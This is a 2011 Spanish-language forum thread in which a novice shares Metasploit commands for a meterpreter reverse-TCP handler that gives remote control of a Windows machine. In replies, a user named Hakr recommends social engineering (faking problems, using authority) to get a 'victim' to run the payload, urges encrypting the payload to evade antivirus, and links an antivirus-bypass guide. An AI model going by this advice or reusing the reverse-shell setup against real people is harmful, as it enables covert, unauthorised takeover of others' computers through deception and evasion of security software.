|
Título: Pregunta metasploit v3.7.1-release Publicado por: VIPbie en 13 Junio 2011, 20:45 pm Hola hola!
Quisiera hacerle unas preguntas relacionadas con el uso de esta herramienta. Estoy apenas relacionándome con ella, recien tengo BT5. y estoy haciendo pruebas con mis equipos. Siguiendo un tutorial, cree el ejecutable con set PAYLOAD windows/meterpreter/reverse_tcp Luego con el Msfconsole: use exploit/multi/handler y pues le hago todo segun el manual, lo meto en una usb y lo ejecuto en la maquina W. enseguida me dió el control absoluto y puedo hacer lo q desee ahi.. Mi pregunta es: esto se puede hacer esto sin que tenga el acceso fisico a la maquina y sin tener que desactivar el AV? Gracias x cualquier info. Título: Re: Pregunta metasploit v3.7.1-release Publicado por: WebRipper en 15 Junio 2011, 19:08 pm hola, estoy casi en las mismas que vos, no se nada pero si pudieras decirme donde encontrar el tutorial ese que tenes estaria agradecido. Por otra parte te recomiendo que postees en los talleres de hacking que hay por el foro.
Título: Re: Pregunta metasploit v3.7.1-release Publicado por: Hakr en 15 Junio 2011, 19:22 pm por supuesto! es mas facil usando algo de Ing. Social, lo mas comun es fingir problemas para incentivar el sentimiento de ayuda depende claro de la relacion que se tenga con las personas, si tenes un status social mas elevado la autoridad seria lo mas sencillo. si preferis la manera dura de hacer las cosas les recomiendo leer este tutorial muy extensivo y buenisimo de los creadores de metasploit => http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training (http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training) el unico problema es que esta en ingles, pero aun asi se aprende muchisimo.
deberias investigar a lo sumo toda la informacion que podas recopilar sobre la maquina victima para asi tener alguna idea de como explotar el sistema, aunque recorda que el sistema mas vulnerable es el humano, suerte! no te olvides de cifrar el payload para que sea indetectable a los antivirus. Título: Re: Pregunta metasploit v3.7.1-release Publicado por: VIPbie en 17 Junio 2011, 04:14 am Uy espera ahí Hakr , como se cifra el payload para que sea indetectable a los antivirus?? eso sí no lo sabía!
Citar no se nada pero si pudieras decirme donde encontrar el tutorial ese que tenes estaria agradecido. WebRipper, cuando dije: 'según el manual' me refería a lo que leí en muchísimos manuales que he encontrado tanto en youtube como en paginas especializadas, he seguido al pie de la letra, he recogido una recopilación de posts, videos y cosas; sobre todo estoy leyendo mucho y tratando de comprender muchas cosas, es complejo pero me encanta!Título: Re: Pregunta metasploit v3.7.1-release Publicado por: VIPbie en 17 Junio 2011, 07:18 am Hay otra cosa que quisiera saber...
Estoy haciendo unas pruebas despues de usar el nmap. Cuando me sale lo siguiente, ¿qué significa exactamente? Handler failed to bind to...xxx.xxx.xxx.xxx ¿Qué es lo que está fallando ahí? Título: Re: Pregunta metasploit v3.7.1-release Publicado por: Hakr en 20 Junio 2011, 04:03 am que raro, podrias poner una toma del scan a ver que es lo que pasa? podrias revisar si tienes winpcap instalado o si tienes bien configurado las opciones del nmap.
Título: Re: Pregunta metasploit v3.7.1-release Publicado por: VIPbie en 24 Junio 2011, 06:38 am Estoy haciendo pruebas en mis maquinas y ....miren, la cosa va por aquí:
msf > use exploit/multi/handler msf exploit(handler) > set LHOST 192.168.0.5 LHOST => 192.168.0.5 msf exploit(handler) > set LPORT 5555 LPORT => 5555 msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set EndOnSession false EndOnSession => false msf exploit(handler) > set RHOST 192.168.0.7 RHOST => 192.168.0.7 msf exploit(handler) > set RPORT 4244 RPORT => 4244 msf exploit(handler) > exploit
Y ahí se queda... En los tutoriales que he visto, arroja enseguida una conexión.... ¿Que no esto teniendo en cuenta? Título: Re: Pregunta metasploit v3.7.1-release Publicado por: .:UND3R:. en 24 Junio 2011, 11:36 am Podría ser el firewall o router?
en realidad no sé Título: Re: Pregunta metasploit v3.7.1-release Publicado por: Hakr en 25 Junio 2011, 21:32 pm VIPbie que tipo de vulnerabilidad estas atacando? estas atacando a una maquina como "Client-Side" o directamente sin la interaccion del cliente?
aqui esta la info de como pasar los antivirus => http://www.offensive-security.com/metasploit-unleashed/Antivirus_Bypass Título: Re: Pregunta metasploit v3.7.1-release Publicado por: VIPbie en 27 Junio 2011, 04:28 am Hakr, ya estoy mirando como pasar los AV's es posible que sea eso. Voy a ver que resultados me siguen dando esas pruebas. gracias.
Título: Re: Pregunta metasploit v3.7.1-release Publicado por: ruben_linux en 18 Julio 2011, 00:17 am http://www.google.es/url?sa=t&source=web&cd=1&ved=0CBgQFjAA&url=http%3A%2F%2Frogunix.com%2Fdocs%2FPentesting%2FMetasploit%2520Toolkit%2520for%2520Penetration%2520Testing%2C%2520Exploit%2520Development%2C%2520%26%2520Vulnerability%2520Research.pdf&rct=j&q=metasploit%20toolkit%20filetype%3Apdf&ei=Ul4jTtquI434sgb8zu24Ag&usg=AFQjCNFjjrz1U1AWNZvHTPqMCpp_lD8r1g&cad=rja (http://www.google.es/url?sa=t&source=web&cd=1&ved=0CBgQFjAA&url=http%3A%2F%2Frogunix.com%2Fdocs%2FPentesting%2FMetasploit%2520Toolkit%2520for%2520Penetration%2520Testing%2C%2520Exploit%2520Development%2C%2520%26%2520Vulnerability%2520Research.pdf&rct=j&q=metasploit%20toolkit%20filetype%3Apdf&ei=Ul4jTtquI434sgb8zu24Ag&usg=AFQjCNFjjrz1U1AWNZvHTPqMCpp_lD8r1g&cad=rja) --> metasploit toolkit bueno para primerizos
http://www.multiupload.com/B0NUUP1I00 http://www.4shared.com/document/HNRid2Uw/metasploit_ch8.html estos dos tb son de metasploit algo mas avanzado |